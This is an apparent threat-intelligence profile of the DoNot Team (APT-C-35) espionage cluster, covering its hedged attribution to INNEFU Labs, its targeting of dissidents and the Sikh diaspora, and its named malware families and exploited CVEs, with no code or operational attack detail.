DoNot Team (also tracked as APT-C-35, SectorE02, Origami Elephant, Viceroy Tiger, and MITRE ATT&CK G0157) is a suspected India- aligned cyber-espionage cluster active since at least 2016 with its highest-confidence public attribution event the Amnesty International Security Lab October 2023 report tying DoNot Team operations to Indian commercial cyber-mercenary / private- contractor INNEFU Labs (an Indian cybersecurity company that has bid for and won contracts with Indian government entities). The Amnesty investigation represented one of the most operationally-specific public attribution findings for any India-aligned cluster, moving attribution beyond country-level "India-aligned suspected" framing toward specific commercial- contractor identification. Whether INNEFU operates DoNot directly, contracts operations to other entities, or operates on behalf of specific Indian government entities (R&AW / IB / NTRO) has not been formally established. No formal US, UK, EU, or other government attribution event has been issued. The cluster is operationally distinct from peer India-aligned clusters in this corpus on several meaningful dimensions: First, DoNot's signature operational pattern is sustained targeting of Indian-domestic dissidents, Kashmiri activists, Sikh political figures, Muslim-minority activists, alongside sustained targeting of Sikh-diaspora activists in Canada, the United Kingdom, the United States, Australia, and Germany. This domestic-and-diaspora dissident-surveillance pattern distinguishes DoNot from SideWinder (Pakistan-government-and-military external focus), Patchwork (Pakistani-government external focus), and Bitter (Pakistan/China/Bangladesh external focus), all of which operate against external rather than India-domestic-or-diaspora targets. The domestic-surveillance pattern became politically consequential in international context following the June 2023 killing of Sikh activist Hardeep Singh Nijjar in Canada and the September 2023 Canadian government public allegation of Indian government involvement.
while formal attribution of any specific Sikh-diaspora cyber operation to DoNot Team specifically (rather than to Indian state activity broadly) has not been established, the cluster's documented Sikh-diaspora targeting pattern constitutes a relevant operational data point for that broader policy context. Second, DoNot's toolkit centers on the Yty modular Windows malware framework (Cisco Talos April 2018 detailed analysis), Gedit downloader, StealJob, DarkMusical, Firestarter (Android), and DoNot Lite, a distinct toolkit from BitterRAT/ARTRA (Bitter), from the SideWinder StealerBot/Backdoor.Pierogi family (SideWinder), and from Patchwork's BADNEWS lineage. Cluster- level toolkit attribution-distinguishing remains the reliable indicator rather than the shared India-alignment framing. Third, Pakistani targeting is one of multiple victim categories rather than the dominant one, distinguishing DoNot's victimology from SideWinder (where Pakistani targeting is the central mission) and Bitter (where Pakistani targeting is primary). DoNot operates across Pakistani, Bangladeshi, Sri Lankan, Nepali, Bhutanese, Burmese, Tajikistan, Kyrgyz, Indian-domestic, Sikh-diaspora, and selected European targets, a broader victim portfolio than peer India-aligned clusters. Operationally DoNot relies predominantly on spear-phishing with weaponized Office documents (CVE-2017-0199, CVE-2017-11882, CVE-2018-0802, CVE-2018-0798, CVE-2022-30190 Follina) followed by Yty implant deployment, with Android mobile implants delivered via fake third-party app stores, trojanized clones of legitimate Indian government apps (notably Kavach two-factor authentication used by Indian government personnel), and targeted APK file delivery via spear-phishing. The cluster has not demonstrated 0day-development capability and primarily relies on rapid weaponization of disclosed n-day vulnerabilities alongside social-engineering tradecraft. A handful of operational notes: First, the post-Amnesty-October-2023 INNEFU Labs attribution has not produced observable operational pause. The cluster continues to operate through 2024 and into 2025 per ESET, Amnesty International, Recorded Future, and other vendor tracking. Second, the contractor-versus-direct framing for India-aligned cluster operations is now better-established for DoNot Team than for SideWinder / Patchwork / Bitter, making DoNot the cluster with the most-specific contractor-level attribution among the publicly-tracked India-aligned cluster ecosystem. The pattern resembles the broader cluster-contractor patterns observable in some China-aligned ecosystems (APT41, Earth Lusca, RedHotel) and in the Iranian cluster ecosystem (Najee Technology Hooshmand and Secnerd LLC sanctioned in August 2024 for Pioneer Kitten operations). Third, the India-aligned cluster ecosystem now has four publicly- tracked distinct clusters in this corpus: SideWinder, Patchwork, Bitter / APT-C-08, and DoNot Team / APT-C-35. Whether the four clusters share infrastructure, tooling, or personnel via common contractors or service entities has been analytically open across vendor reporting. The INNEFU-DoNot connection from Amnesty 2023 is one specific data point in the broader open question.